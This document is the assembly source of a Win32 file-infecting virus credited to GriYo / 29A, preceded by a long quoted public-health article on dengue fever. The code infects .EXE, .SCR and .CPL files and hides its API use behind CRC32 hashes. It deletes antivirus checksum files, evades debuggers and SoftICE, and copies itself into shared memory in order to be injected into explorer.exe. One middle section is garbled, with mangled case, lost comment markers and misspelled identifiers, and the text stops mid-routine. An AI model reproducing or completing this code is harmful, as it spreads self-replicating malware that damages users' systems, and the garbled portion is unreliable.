Win32.Fever.asm

xiaoxiao2021-03-05  26

; =============================================================================
;
; Dengue Hemorrhagic Fever
;
; Biocode by GriYo / 29A
; Griyo@bi0.net
;
; =============================================================================
;
; About the biomodel
; ------------------
;
; Dengue and Dengue Hemorrhagic Fever: The Emergence of a Global Health Problem
;
; Dengue and dengue hemorrhagic fever (DHF) are caused by one of four
; closely related, but antigenically distinct, virus serotypes (DEN-1, DEN-2,
; DEN-3, and DEN-4), of the genus Flavivirus. Infection with one of these
; serotypes does not provide cross-protective immunity, so persons living in
; a dengue-endemic area can have four dengue infections during their
; lifetimes. Dengue is primarily an urban disease of the tropics, and the
; viruses that cause it are maintained in a cycle that involves humans and
; Aedes aegypti, a domestic, day-biting mosquito that prefers to feed on
; humans. Infection with a dengue virus serotype can produce a spectrum of
; clinical illness, ranging from a nonspecific viral syndrome to severe and
; fatal hemorrhagic disease. Important risk factors for DHF include the
; strain and serotype of the virus involved, as well as the age, immune
; status, and genetic predisposition of the patient.
;
; The first reported epidemics of dengue fever occurred in 1779-1780
; in Asia, Africa, and North America; the near simultaneous occurrence of
; outbreaks on three continents indicates that these viruses and their
; mosquito vector have had a worldwide distribution in the tropics for more
; than 200 years. During most of this time, dengue fever was considered a
; benign, nonfatal disease of visitors to the tropics. Generally, there were
; long intervals (10-40 years) between major epidemics, mainly because the
; viruses and their mosquito vector could only be transported between
; population centers by sailing vessels.
;
; A global pandemic of dengue began in Southeast Asia after World
; War II and has intensified during the last 15 years. Epidemics caused by
; multiple serotypes (hyperendemicity) are more frequent, the geographic
; distribution of dengue viruses has expanded, and DHF has emerged in the
; Pacific region and the Americas. In Southeast Asia, epidemic DHF
; first appeared in the 1950s, but by 1975 it had become a leading cause of
; hospitalization and death among children in many countries. In the 1980s,
; DHF began a second expansion into Asia when Sri Lanka, India, and the
; Maldive Islands had their first major DHF epidemics; Pakistan first
; reported an epidemic of dengue fever in 1994. The recent epidemics in
; Sri Lanka and India were associated with multiple dengue virus serotypes,
; but DEN-3 was predominant and was genetically distinct from DEN-3 viruses
; previously isolated from infected persons in those countries.
;
; After an absence of 35 years, epidemic dengue fever occurred in
; both Taiwan and the People's Republic of China in the 1980s. The People's
; Republic of China had a series of epidemics caused by all four serotypes,
; and its first major epidemic of DHF, caused by DEN-2, was reported on
; Hainan Island in 1985. Singapore also had a resurgence of dengue/DHF
; from 1990 to 1994 after a successful control program had prevented
; significant transmission for over 20 years. In other countries of Asia
; where DHF is endemic, the epidemics have become progressively larger in the
; last 15 years.
;
; In the Pacific, dengue viruses were reintroduced in the early 1970s
; after an absence of more than 25 years. Epidemic activity caused by all
; four serotypes has intensified in recent years with major epidemics of DHF
; on several islands.
;
; Despite poor surveillance for dengue in Africa, we know that
; epidemic dengue fever caused by all four serotypes has increased
; dramatically since 1980. Most activity has occurred in East Africa, and
; major epidemics were reported for the first time in the Seychelles (1977),
; Kenya (1982, DEN-2), Mozambique (1985, DEN-3), Djibouti (1991-92, DEN-2),
; Somalia (1982, 1993, DEN-2), and Saudi Arabia (1994, DEN-2) (CDC,
; unpublished data). Epidemic DHF has been reported in neither Africa nor the
; Middle East, but sporadic cases clinically compatible with DHF have been
; reported from Mozambique, Djibouti, and Saudi Arabia (CDC, unpublished
; data).
;
; The emergence of dengue/DHF as a major public health problem has
; been most dramatic in the American region. In an effort to prevent urban
; yellow fever, which is also transmitted by Ae. aegypti, the Pan American
; Health Organization organized a campaign that eradicated Ae. aegypti from
; most Central and South American countries in the 1950s and 1960s. As a
; result, epidemic dengue occurred only sporadically in some Caribbean
; islands during this period. The Ae. aegypti eradication program, which was
; officially discontinued in the United States in 1970, gradually eroded
; elsewhere, and this species began to reinfest countries from which it had
; been eradicated. In 1995, the geographic distribution of Ae. aegypti was
; similar to its distribution before the eradication program.
;
; In 1970, only DEN-2 virus was present in the Americas, although
; DEN-3 may have had a focal distribution in Colombia and Puerto Rico. In
; 1977, DEN-1 was introduced and caused major epidemics throughout the
; region over a 16-year period. DEN-4 was introduced in 1981 and caused
; similar widespread epidemics. Also in 1981, a new strain of DEN-2 from
; Southeast Asia caused the first major DHF epidemic in the Americas (Cuba).
; This strain has spread rapidly throughout the region and has caused
; outbreaks of DHF in Venezuela, Colombia, Brazil, French Guiana, Suriname,
; and Puerto Rico. By 1995, 14 countries in the American region had reported
; confirmed DHF cases, and DHF is endemic in many of these countries.
;
; DEN-3 virus recently reappeared in the Americas after an absence of
; 16 years. This serotype was first detected in association with a 1994
; dengue/DHF epidemic in Nicaragua. Almost simultaneously, DEN-3 was
; confirmed in Panama and, in early 1995, in Costa Rica (CDC, unpublished
; data). In Nicaragua, considerable numbers of DHF cases were associated with
; the epidemic, which was apparently caused by DEN-3. In Panama and Costa
; Rica, the cases were classic dengue fever.
;
; Viral envelope gene sequence data from the DEN-3 strains isolated
; from Panama and Nicaragua have shown that this new American DEN-3 virus
; strain was likely a recent introduction from Asia since it is genetically
; distinct from the DEN-3 strain found previously in the Americas, but is
; identical to the DEN-3 virus serotype that caused major DHF epidemics in
; Sri Lanka and India in the 1980s (R. Lanciotti, unpublished data). The new
; DEN-3 strain, and the susceptibility of the population in the American
; tropics to it, suggests that DEN-3 will spread rapidly throughout the
; region and likely will cause major epidemics of dengue/DHF in the near
; future.
;
; In 1995, dengue is the most important mosquito-borne viral disease
; affecting humans; its global distribution is comparable to that of malaria,
; and an estimated 2.5 billion people are living in areas at risk for epidemic
; transmission. Each year, tens of millions of cases of dengue fever occur
; and, depending on the year, up to hundreds of thousands of cases of DHF. The
; case-fatality rate of DHF in most countries is about 5%; most fatal cases
; are among children.
;
; There is a small, but significant, risk for dengue outbreaks in the
; continental United States. Two competent mosquito vectors, Ae. aegypti and
; Aedes albopictus, are present and, under certain circumstances, each could
; transmit dengue viruses. This type of transmission has been detected twice
; in the last 15 years in south Texas (1980 and 1986) and has been associated
; with dengue epidemics in northern Mexico. Moreover, numerous viruses are
; introduced regularly by travelers returning from tropical areas where dengue
; viruses are endemic. From 1977 to 1994, a total of 2,248 suspected cases of
; imported dengue were reported in the United States (CDC, unpublished data).
; Although some specimens collected were not adequate for laboratory
; diagnosis, preliminary data indicate that 481 (21%) cases were confirmed as
; dengue (CDC, unpublished data). Many more cases probably go unreported each
; year because surveillance in the United States is passive and relies on
; physicians to recognize the disease, inquire about the patient's travel
; history, obtain proper diagnostic samples, and report the case. These data
; underscore the fact that southern Texas and the southeastern United States,
; where Ae. aegypti is found, are at risk for dengue transmission and
; sporadic outbreaks.
;
; The reasons for this dramatic global emergence of dengue/DHF as a
; major public health problem are complex and not well understood. However,
; several important factors can be identified. First, effective mosquito
; control is virtually nonexistent in most dengue-endemic countries.
; Considerable emphasis for the past 20 years has been placed on
; ultra-low-volume insecticide sprays for adult mosquito control, a
; relatively ineffective approach for controlling Ae. aegypti. Second, major
; global demographic changes have occurred, the most important of which have
; been uncontrolled urbanization and concurrent population growth. These
; demographic changes have resulted in substandard housing and inadequate
; water, sewer, and waste management systems, all of which increase
; Ae. aegypti population densities and facilitate transmission of
; Ae. aegypti-borne disease. Third, increased travel by airplane provides
; the ideal mechanism for transporting dengue viruses between population
; centers of the tropics, resulting in a constant exchange of dengue viruses
; and other pathogens. Lastly, in most countries the public health
; infrastructure has deteriorated. Limited financial and human resources and
; competing priorities have resulted in a "crisis mentality" with emphasis
; on implementing so-called emergency control methods in response to
; epidemics rather than on preventing epidemic transmission. This approach
; has been particularly detrimental to dengue control because, in most
; countries, surveillance is very inadequate; the system to detect increased
; transmission normally relies on reports by local physicians who often do
; not consider dengue in their diagnoses. As a result, an epidemic has often
; reached or passed the peak of transmission before it is detected.
;
; No dengue vaccine is available. Recently, however, attenuated
; candidate vaccine viruses have been developed in Thailand. These vaccines
; are safe and immunogenic when given in various formulations, including a
; quadrivalent vaccine for all four dengue virus serotypes. Unfortunately,
; efficacy trials in human volunteers have yet to be initiated. Research is
; also being conducted to develop second-generation recombinant vaccine
; viruses; the Thailand attenuated viruses are used as a template. However,
; an effective dengue vaccine for public use will not be available for 5 to
; 10 years.
;
; Prospects for reversing the recent trend of increased epidemic
; activity and geographic expansion of dengue are not promising. New dengue
; virus strains and serotypes will likely continue to be introduced into many
; areas where the population densities of Ae. aegypti are at high levels. With
; no new mosquito control technology available, in recent years public health
; authorities have emphasized disease prevention and mosquito control through
; community efforts to reduce larval breeding sources. Although this approach
; will probably be effective in the long run, it is unlikely to impact disease
; transmission in the near future. We must, therefore, develop improved,
; proactive, laboratory-based surveillance systems that can provide early
; warning of an impending dengue epidemic. At the very least, surveillance
; results can alert the public to take action and physicians to diagnose and
; properly treat dengue/DHF cases.
;
; Duane J. Gubler and Gary G. Clark
; National Center for Infectious Diseases
; Centers for Disease Control and Prevention
; Fort Collins, Colorado, and San Juan, Puerto Rico, USA
;
; =============================================================================

                .386p
                locals
                jumps
                .model  flat,stdcall

                include Win32API.inc
                include useful.inc
                include mz.inc
                include pe.inc

                extrn   GetModuleHandleA:near
                extrn   Sleep:near

Number_of_poly_layers   equ     04h     ; max number of poly decryptors

; =============================================================================
; Fake host used for virus 1st generation
; =============================================================================

_text           segment dword use32 public 'CODE'

; =============================================================
; We need the CRC lookup table for the next steps
; =============================================================

host_code:      xor     ebp,ebp
                call    make_crc_tbl

; =============================================================
; Save the CRC32 of 'KERNEL32.DLL' inside virus body
; =============================================================

                mov     esi,offset G1_szKernel32
                call    get_str_crc32
                mov     dword ptr [crcKernel32],edx

; =============================================================
; Save the CRC32 of 'GetProcAddress' inside virus body
; =============================================================

                mov     esi,offset G1_szGetProcAddr
                call    get_str_crc32
                mov     dword ptr [crcGetProcAddr],edx

; =============================================================
; Save the CRC32 of infectable file extensions
; =============================================================

                mov     esi,offset G1_szEXE
                call    get_str_crc32
                mov     dword ptr [crc32_szEXE],edx
                mov     esi,offset G1_szSCR
                call    get_str_crc32
                mov     dword ptr [crc32_szSCR],edx
                mov     esi,offset G1_szCPL
                call    get_str_crc32
                mov     dword ptr [crc32_szCPL],edx

; =============================================================
; Save the CRC32 of some AV files
; =============================================================

                mov     ecx,NumberOfAV
                mov     esi,offset G1_AV_names
                mov     edi,offset tblCRC32AV
                call    save_crc_names

; =============================================================
; Save the CRC32 of explorer.exe
; =============================================================

                mov     esi,offset G1_szExplorer
                call    get_str_crc32
                mov     dword ptr [crcszExplorer],edx

; =============================================================
; Save the CRC32 of 'user32.dll'
; =============================================================

                mov     esi,offset G1_szUser32
                call    get_str_crc32
                mov     dword ptr [crcszUser32],edx

; =============================================================
; Save the CRC32 of 'psapi.dll'
; =============================================================

                mov     esi,offset G1_szPsapi
                call    get_str_crc32
                mov     dword ptr [crcszPsapi],edx

; =============================================================
; Save the CRC32 of 'imagehlp.dll'
; =============================================================

                mov     esi,offset G1_szImgHlp
                call    get_str_crc32
                mov     dword ptr [crcszImgHlp],edx

; =============================================================
; Save the CRC32 of 'sfc.dll'
; =============================================================

                mov     esi,offset G1_szSfc
                call    get_str_crc32
                mov     dword ptr [crcszSfc],edx

; =============================================================
; Get CRCs of needed APIs and save them inside virus body
; Let's start with kernel32 API names
; =============================================================

                mov     ecx,NumK32Apis
                mov     esi,offset NamesK32Apis
                mov     edi,offset CRC32K32Apis
                call    save_crc_names

; =============================================================
; These are some specially handled APIs
; =============================================================

                mov     ecx,00000001h
                mov     esi,offset Name_IsDebuggerPresent
                mov     edi,offset CRC32_IsDebugPr
                call    save_crc_names

; =============================================================
; Get Toolhelp APIs (Windows 9x only)
; =============================================================

                mov     ecx,NumToolhelpApis
                mov     esi,offset NamesToolhelpApis
                mov     edi,offset CRC32ToolhelpApis
                call    save_crc_names

; =============================================================
; Get psapi.dll APIs (Windows NT & Windows 2000 only)
; =============================================================

                mov     ecx,NumPsapiApis
                mov     esi,offset NamesPsapiApis
                mov     edi,offset CRC32PsapiApis
                call    save_crc_names

; =============================================================
; Get API used to compute image checksum
; =============================================================

                mov     ecx,NumImgHlpApis
                mov     esi,offset NamesImgHlpApis
                mov     edi,offset CRC32ImgHlpApis
                call    save_crc_names

; =============================================================
; Get API used to check for Windows 2000 System File Protection
; =============================================================

                mov     ecx,NumSfcApis
                mov     esi,offset NamesSfcApis
                mov     edi,offset CRC32SfcApis
                call    save_crc_names

; =============================================================
; Get CRC32 of user32 API names (ANSI version)
; =============================================================

                mov     ecx,NumUser32Apis
                mov     esi,offset NamesUser32ApisW9x
                mov     edi,offset CRC32User32ApisW9x
                call    save_crc_names

; =============================================================
; Get CRC32 of user32 API names (wide version)
; =============================================================

                mov     ecx,NumUser32Apis
                mov     esi,offset NamesUser32ApisWNT
                mov     edi,offset CRC32User32ApisWNT
                call    save_crc_names

; =============================================================
; Build the do-not-infect-file-by-name CRC32 table
; =============================================================

                mov     ecx,Avoid_Num
                mov     esi,offset G1_avoid_files
                mov     edi,offset Avoid_tbl
                call    save_crc_names

; =============================================================
; Get kernel32.dll module handle
; =============================================================

                push    offset G1_szKernel32
                call    GetModuleHandleA
                or      eax,eax
                jz      out_1st_gen
                mov     ebx,eax
                xor     ebp,ebp
                db      05h dup (90h)
                call    get1st_end
                db      05h dup (90h)

; =============================================================
; Let the 1st generation host running
; =============================================================

out_1st_gen:    push    0FFFFFFFFh
                call    Sleep
                jmp     out_1st_gen     ; never executed, but I don't want to
                                        ; remove it. Anyway, this won't take
                                        ; part of the main virus body...

; =============================================================
; Ready to jump into main virus body !!!!
; =============================================================

get1st_end:     push    eax             ; space for ebx
                push    eax             ; space for esi
                push    eax             ; space for edi
                push    eax             ; space for ebp
                xor     ebp,ebp
                jmp     entry_1st_gen

; =============================================================
; Routine that converts API names into CRC32 values
; =============================================================

save_crc_names: cld
get_G1_crc:     push    ecx
                lodsd
                push    esi
                mov     esi,eax
                call    get_str_crc32
                mov     eax,edx
                stosd
                pop     esi
                pop     ecx
                loop    get_G1_crc
                ret

_text           ends

; =============================================================================
; Here comes the rest of the sections in virus 1st generation
; =============================================================================

_data           segment dword use32 public 'DATA'

; =============================================================
; Used to locate kernel32 base address on 1st generation
; =============================================================

G1_szKernel32   db      'KERNEL32.DLL',00h
G1_szGetProcAddr db     'GetProcAddress',00h

; =============================================================
; Used to check if file extension is infectable
; =============================================================

G1_szEXE        db      '.EXE',00h
G1_szSCR        db      '.SCR',00h
G1_szCPL        db      '.CPL',00h

; =============================================================
; This virus uses CRC32 instead of DLL names !!!!
;
; LoadLibrary requires the DLL name as parameter... but
; we can find the DLL name by browsing the System32 directory
; for a file whose CRC32 matches a given one
; =============================================================

G1_szExplorer   db      'EXPLORER.EXE',00h
G1_szUser32     db      'USER32.DLL',00h
G1_szPsapi      db      'PSAPI.DLL',00h
G1_szImgHlp     db      'IMAGEHLP.DLL',00h
G1_szSfc        db      'SFC.DLL',00h

; =============================================================
; Do not infect files with these character combinations in
; their name
; =============================================================

G1_avoid_files  equ     $
                dd      offset G1_avoid_00
                dd      offset G1_avoid_01
                dd      offset G1_avoid_02
                dd      offset G1_avoid_03
                dd      offset G1_avoid_04
                dd      offset G1_avoid_05
                dd      offset G1_avoid_06
                dd      offset G1_avoid_07
                dd      offset G1_avoid_08
                dd      offset G1_avoid_09
                dd      offset G1_avoid_0A
                dd      offset G1_avoid_0B
                dd      offset G1_avoid_0C
                dd      offset G1_avoid_0D
                dd      offset G1_avoid_0E
                dd      offset G1_avoid_0F
                dd      offset G1_avoid_10
                dd      offset G1_avoid_11
                dd      offset G1_avoid_12
                dd      offset G1_avoid_13
                dd      offset G1_avoid_14
                dd      offset G1_avoid_15
                dd      offset G1_avoid_16
                dd      offset G1_avoid_17
                dd      offset G1_avoid_18
Avoid_Num       equ     ($-G1_avoid_files)/04h

G1_avoid_00     db      'DR',00h
G1_avoid_01     db      'PA',00h
G1_avoid_02     db      'RO',00h
G1_avoid_03     db      'VI',00h
G1_avoid_04     db      'AV',00h
G1_avoid_05     db      'TO',00h
G1_avoid_06     db      'CA',00h
G1_avoid_07     db      'IN',00h
G1_avoid_08     db      'MS',00h
G1_avoid_09     db      'SR',00h
G1_avoid_0A     db      'SP',00h
G1_avoid_0B     db      'RP',00h
G1_avoid_0C     db      'PR',00h
G1_avoid_0D     db      'NO',00h
G1_avoid_0E     db      'CE',00h
G1_avoid_0F     db      'LE',00h
G1_avoid_10     db      'MO',00h
G1_avoid_11     db      'SM',00h
G1_avoid_12     db      'DD',00h
G1_avoid_13     db      'SO',00h
G1_avoid_14     db      'SQ',00h
G1_avoid_15     db      'EX',00h
G1_avoid_16     db      'IE',00h
G1_avoid_17     db      'CM',00h
G1_avoid_18     db      'CO',00h

; =============================================================
; Delete these AV files
; =============================================================

G1_AV_names     equ     $
                dd      offset G1_delete_00
                dd      offset G1_delete_01
                dd      offset G1_delete_02
                dd      offset G1_delete_03
                dd      offset G1_delete_04
NumberOfAV      equ     ($-G1_AV_names)/04h

G1_delete_00    db      'AVP.CRC',00h
G1_delete_01    db      'ANTI-VIR.DAT',00h
G1_delete_02    db      'CHKLIST.CPS',00h
G1_delete_03    db      'CHKLIST.MS',00h
G1_delete_04    db      'IVP.NTZ',00h

; =============================================================
; Kernel32.dll API names
;
; Note that these tables and strings are not included into the
; virus body after 1st generation. Only CRC32 values
; =============================================================

NamesK32Apis    equ     $
                dd      offset G1_CreateFileA
                dd      offset G1_CreateFileMappingA
                dd      offset G1_CreateProcessA
                dd      offset G1_CreateThread
                dd      offset G1_CloseHandle
                dd      offset G1_DeleteFileA
                dd      offset G1_ExitThread
                dd      offset G1_FindClose
                dd      offset G1_FindFirstFileA
                dd      offset G1_FindNextFileA
                dd      offset G1_FreeLibrary
                dd      offset G1_GetComputerNameA
                dd      offset G1_GetCurrentProcess
                dd      offset G1_GetDriveTypeA
                dd      offset G1_GetFileAttributesA
                dd      offset G1_GetLastError
                dd      offset G1_GetLocalTime
                dd      offset G1_GetLogicalDriveStringsA
                dd      offset G1_GetSystemDirectoryA
                dd      offset G1_GetVersionEx
                dd      offset G1_LoadLibraryA
                dd      offset G1_MapViewOfFile
                dd      offset G1_OpenFileMappingA
                dd      offset G1_OpenProcess
                dd      offset G1_ReadProcessMemory
                dd      offset G1_SetEndOfFile
                dd      offset G1_SetFileAttributesA
                dd      offset G1_SetFilePointer
                dd      offset G1_SetFileTime
                dd      offset G1_Sleep
                dd      offset G1_UnmapViewOfFile
                dd      offset G1_WriteProcessMemory

G1_CreateFileA  db      'CreateFileA',00h
G1_CreateFileMappingA db 'CreateFileMappingA',00h
G1_CreateProcessA db    'CreateProcessA',00h
G1_CreateThread db      'CreateThread',00h
G1_CloseHandle  db      'CloseHandle',00h
G1_DeleteFileA  db      'DeleteFileA',00h
G1_ExitThread   db      'ExitThread',00h
G1_FindClose    db      'FindClose',00h
G1_FindFirstFileA db    'FindFirstFileA',00h
G1_FindNextFileA db     'FindNextFileA',00h
G1_FreeLibrary  db      'FreeLibrary',00h
G1_GetComputerNameA db  'GetComputerNameA',00h
G1_GetCurrentProcess db 'GetCurrentProcess',00h
G1_GetDriveTypeA db     'GetDriveTypeA',00h
G1_GetFileAttributesA db 'GetFileAttributesA',00h
G1_GetLastError db      'GetLastError',00h
G1_GetLocalTime db      'GetLocalTime',00h
G1_GetLogicalDriveStringsA db 'GetLogicalDriveStringsA',00h
G1_GetSystemDirectoryA db 'GetSystemDirectoryA',00h
G1_LoadLibraryA db      'LoadLibraryA',00h
G1_GetVersionEx db      'GetVersionExA',00h
G1_MapViewOfFile db     'MapViewOfFile',00h
G1_OpenFileMappingA db  'OpenFileMappingA',00h
G1_OpenProcess  db      'OpenProcess',00h
G1_ReadProcessMemory db 'ReadProcessMemory',00h
G1_SetEndOfFile db      'SetEndOfFile',00h
G1_SetFileAttributesA db 'SetFileAttributesA',00h
G1_SetFilePointer db    'SetFilePointer',00h
G1_SetFileTime  db      'SetFileTime',00h
G1_Sleep        db      'Sleep',00h
G1_UnmapViewOfFile db   'UnmapViewOfFile',00h
G1_WriteProcessMemory db 'WriteProcessMemory',00h

; =============================================================
; Special kernel32 APIs
; =============================================================

Name_IsDebuggerPresent  dd offset G1_IsDebuggerPresent
G1_IsDebuggerPresent    db 'IsDebuggerPresent',00h

; =============================================================
; Toolhelp APIs
; =============================================================

NamesToolhelpApis equ   $
                dd      offset G1_CreateToolhelp32Snapshot
                dd      offset G1_Process32First
                dd      offset G1_Process32Next
                dd      offset G1_Module32First
                dd      offset G1_Module32Next

G1_CreateToolhelp32Snapshot db 'CreateToolhelp32Snapshot',00h
G1_Process32First db    'Process32First',00h
G1_Process32Next db     'Process32Next',00h
G1_Module32First db     'Module32First',00h
G1_Module32Next db      'Module32Next',00h

; =============================================================
; psapi.dll API names
; =============================================================

NamesPsapiApis  equ     $
                dd      offset G1_EnumProcessModules
                dd      offset G1_EnumProcesses
                dd      offset G1_GetModuleBaseNameA
                dd      offset G1_GetModuleInformation

G1_EnumProcessModules db 'EnumProcessModules',00h
G1_EnumProcesses db     'EnumProcesses',00h
G1_GetModuleBaseNameA db 'GetModuleBaseNameA',00h
G1_GetModuleInformation db 'GetModuleInformation',00h

; =============================================================
; sfc.dll API names
; =============================================================

NamesSfcApis    equ     $
                dd      offset G1_SfcIsFileProtected

G1_SfcIsFileProtected db 'SfcIsFileProtected',00h

; =============================================================
; imagehlp.dll API names
; =============================================================

NamesImgHlpApis equ     $
                dd      offset G1_CheckSumMappedFile

G1_CheckSumMappedFile db 'CheckSumMappedFile',00h

; =============================================================
; user32.dll API names (ANSI version)
; =============================================================

NamesUser32ApisW9x equ  $
                dd      offset G1W9x_DefWindowProc

G1W9x_DefWindowProc db  'DefWindowProcA',00h

; =============================================================
; user32.dll API names (wide version)
; =============================================================

NamesUser32ApisWNT equ  $
                dd      offset G1WNT_DefWindowProc

G1WNT_DefWindowProc db  'DefWindowProcW',00h

_data           ends

_bss            segment dword use32 public 'BSS'
_bss            ends

; =============================================================================
; Viral section
;
; You have to understand that all the above-mentioned is not part of the virus.
; This means that the text strings and other information previous to this
; point will be discarded
; =============================================================================

virseg          segment dword use32 public 'dengue'

; =============================================================
; Get delta offset in EBP
; =============================================================

viro_sys:       call    hostdelta
hostdelta:      pop     ebp
                sub     ebp,offset hostdelta

; =============================================================
; Create CRC32 lookup table... this virus uses CRC32 in lots
; of places along its code... precalculated tables help to
; really speed up virus activity
; =============================================================

                call    make_crc_tbl

; =============================================================
; Check CRC32 of main virus body
;
; ESI -> ptr to buffer
; ECX -> buffer size
; =============================================================

                mov     ecx,SizeOfProtect
                lea     esi,dword ptr [ebp+CRC_PROTECTED]
                call    get_crc32

; =============================================================
; Checksum matches?
; =============================================================

                db      0B8h            ; mov eax,imm32
viralchecksum   dd      00000000h
                cmp     eax,edx
                jne     critical_error

CRC_PROTECTED   equ     $

; ================================================== ===========

Scan System Memory Looking for kernel32.dll

; ================================================== ===========

Kernelscanning: Pushad

FK32_TRY_01: MOV EAX, 080000101H

Call IgetNTBaseAddr

JECXZ FK32_TRY_02

JMP short kernel_found

FK32_TRY_02: MOV EAX, 0C0000101H

Call IgetNTBaseAddr

JECXZ FK32_TRY_03

JMP short kernel_found

FK32_TRY_03: XOR EAX, EAX

Call IgetNTBaseAddr

Kernel_found: Jecxz critical_ERROR

Mov DWORD PTR [ESP.PUSHAD_EBX], ECX

Popad

; ================================================== ===========

This is the entry-point for 1st generation

Now EBX POINTS TO KERNEL32.DLL BASE Address

; ================================================== =========== Entry_1st_gen: Mov DWORD PTR [EBP Hkernel32], EBX

; ================================================== ===========

; Search for getProcaddress Entry-Point

; ================================================== ===========

Call getGetProcaddr

Jecxz critical_error

MOV DWORD PTR [EBP A_GETPROCADDRESS], ECX

; ================================================== ===========

Get Kernel32 API Addresses

; ================================================== ===========

MOV ECX, Numk32apis

LEA ESI, DWORD PTR [EBP CRC32K32APIS] Lea EDI, DWORD PTR [EBP EPK32APIS]

Call get_apis

Jecxz Restorehost

; ================================================== ===========

Everyhes Have to Work, Buti Something Goes Wrong this

Will Halt The Process

; ================================================== ===========

Critical_ERROR: JMP critical_ERROR

; ================================================== ===========

Restore Host Code

;

Make The Return Address Point To The Instruction Which

Made the Call

; ================================================== ===========

API_PUSH_SIZE EQU 00000004H * 00000004H

RESTOREHOST: Lea ESI, DWORD PTR [ESP API_PUSH_SIZE]

Sub DWORD PTR [ESI], 00000005H

CLD

Lodsd

LEA ESI, DWORD PTR [EBP EP_BYTES]]

PUSH ESI

Push 00000005H

Call get_org_codeorg_code db 05h DUP (90H)

GET_ORG_CODE: PUSH EAX

Call DWORD PTR [EBP A_GETCURRENTPROCESS]

Push EAX

Call DWORD PTR [EBP A_WRITEPROCESSMORY]

OR EAX, EAX

JZ Critical_ERROR

CLD

Lodsd

CMP EAX, 00000005H

JNE Critical_ERROR

;===========================================================================
; Try to locate IsDebuggerPresent API
;===========================================================================

                mov     ecx,00000001h
                lea     esi,dword ptr [ebp+crc32_IsDebugPr]
                lea     edi,dword ptr [ebp+a_IsDebuggerPresent]
                call    get_apis
                jecxz   DetectDebug
                jmp     short si_lookup

;===========================================================================
; Check if the current process is running in the context of a debugger
;===========================================================================

DetectDebug:    call    dword ptr [ebp+a_IsDebuggerPresent]
                or      eax,eax
                jnz     GoBack2Host

;===========================================================================
; SoftICE lookup
;
; Code based on the article "Win32 Anti-Debugging Tricks" by
; Billy Belcebu / iKX (published in Xine #4)
;===========================================================================

si_lookup:      mov     esi,dword ptr [ebp+a_CreateFileA]
                push    ecx                             ; hTemplateFile
                push    FILE_ATTRIBUTE_READONLY         ; dwFlagsAndAttributes
                push    OPEN_EXISTING                   ; dwCreationDisposition
                push    ecx                             ; lpSecurityAttributes
                push    FILE_SHARE_READ                 ; dwShareMode
                push    GENERIC_READ                    ; dwDesiredAccess
                call    get_szSIW9x                     ; lpFileName
                db      '\\.\SICE',00h
get_szSIW9x:    call    esi
                cmp     eax,INVALID_HANDLE_VALUE
                jne     si_found
                push    00000000h
                push    FILE_ATTRIBUTE_READONLY
                push    OPEN_EXISTING
                push    00000000h
                push    FILE_SHARE_READ
                push    GENERIC_READ
                call    get_szSIWNT
                db      '\\.\NTICE',00h
get_szSIWNT:    call    esi
                cmp     eax,INVALID_HANDLE_VALUE
                je      si_notfound
si_found:       push    eax
                call    dword ptr [ebp+a_CloseHandle]
                jmp     GoBack2Host

;===========================================================================
; Get an object name based on current hostname
;===========================================================================

si_notfound:    lea     edi,dword ptr [ebp+SizeOfComputerName]
                push    edi                     ; lpnSize
                mov     eax,00000020h
                cld
                stosd                           ; edi -> name buffer
                push    edi                     ; lpBuffer
                call    dword ptr [ebp+a_GetComputerName]
                or      eax,eax
                jz      GoBack2Host
                mov     esi,edi
                call    get_str_crc32           ; edx -> crc32 of the hostname
                movzx   ecx,byte ptr [edi]
                and     ecx,00000003h           ; number of characters
                inc     ecx
                lea     edi,dword ptr [ebp+szObjectName]
LoopBuildNick:  mov     al,dl
                and     al,0Fh
                add     al,'A'                  ; get character
                stosb
                shr     edx,04h
                loop    LoopBuildNick
                mov     eax,00003233h           ; '32'
                stosd
                mov     al,cl                   ; ecx is zero here -> null terminator
                stosb

;===========================================================================
; Allocate shared memory
;
; MSDN says:
;
; "A shared file-mapping object will not be destroyed until all processes
;  that use it close their handles to it by using the CloseHandle function."
;
; So the idea is to use CreateFileMapping and MapViewOfFile instead of
; VirtualAlloc... then open this file-mapping from a piece of code
; injected into Explorer.exe
;===========================================================================

                lea     eax,dword ptr [ebp+szObjectName]
                push    eax                     ; lpName
                push    ALLOC_SIZE              ; dwMaximumSizeLow
                push    00000000h               ; dwMaximumSizeHigh
                push    PAGE_READWRITE          ; flProtect
                push    00000000h               ; lpAttributes
                push    0FFFFFFFFh              ; hFile = INVALID_HANDLE_VALUE (pagefile-backed)
                call    dword ptr [ebp+a_CreateFileMappingA]
                or      eax,eax
                jz      GoBack2Host
                mov     edi,eax
                call    dword ptr [ebp+a_GetLastError]
                cmp     eax,000000B7h           ; ERROR_ALREADY_EXISTS
                jne     ResCheckOk
                push    edi
                call    dword ptr [ebp+a_CloseHandle]
                jmp     GoBack2Host

ResCheckOk:     push    00000000h               ; dwNumberOfBytesToMap
                push    00000000h               ; dwFileOffsetLow
                push    00000000h               ; dwFileOffsetHigh
                push    FILE_MAP_WRITE          ; dwDesiredAccess
                push    edi                     ; hFileMappingObject
                call    dword ptr [ebp+a_MapViewOfFile]
                or      eax,eax
                jz      GoBack2Host

;===========================================================================
; Copy virus to allocated memory block
;===========================================================================

                lea     esi,dword ptr [ebp+viro_sys]
                mov     edi,eax
                mov     ecx,SIZE_VIRTUAL
                cld
                rep     movsb

;===========================================================================
; Continue execution on allocated memory !!!!!!!!
;
; This means we are ...
;===========================================================================

                add     eax,offset HostVirMem-offset viro_sys
                push    eax
                ret

;===========================================================================
; Code executed into allocated memory... extended buffers are available now
;===========================================================================

HostVirMem:     call    MemDelta
MemDelta:       pop     ebp
                sub     ebp,offset MemDelta

;===========================================================================
; The virus needs to locate the system directory in order to load DLLs
; by using crc32 instead of their names
;===========================================================================

                push    MAX_PATH
                lea     edi,dword ptr [ebp+szSystemDir]
                push    edi
                call    dword ptr [ebp+a_GetSystemDirectoryA]
                or      eax,eax
                jz      GoBack2Host
                add     edi,eax                 ; edi -> the null terminator
                cld
                mov     eax,'d.*\'              ; add '\*.dll'
                stosd
                mov     eax,00004C4Ch           ; 'll',0,0
                stosd

;===========================================================================
; Get OS version
;===========================================================================

                lea     esi,dword ptr [ebp+system_version]
                push    esi
                mov     dword ptr [esi],00000094h       ; dwOSVersionInfoSize
                call    dword ptr [ebp+a_GetVersionEx]
                or      eax,eax
                jz      FreeUser32
                add     esi,00000010h                   ; esi -> dwPlatformId
                cld
                lodsd
                cmp     eax,VER_PLATFORM_WIN32_NT
                je      MemInfectWinNT
                cmp     eax,VER_PLATFORM_WIN32_WINDOWS
